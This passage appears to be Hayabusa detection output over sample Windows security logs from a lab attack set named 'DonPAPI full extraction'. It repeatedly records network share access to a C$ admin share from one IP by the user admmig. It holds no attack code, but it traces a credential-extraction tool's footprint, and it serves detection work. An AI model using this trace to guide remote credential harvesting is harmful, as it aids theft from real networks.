\??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.354 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.370 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.371 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.372 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.388 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.407 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.408 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.424 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.439 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.455 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.471 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.486 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.502 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.502 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.502 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.549 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.564 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 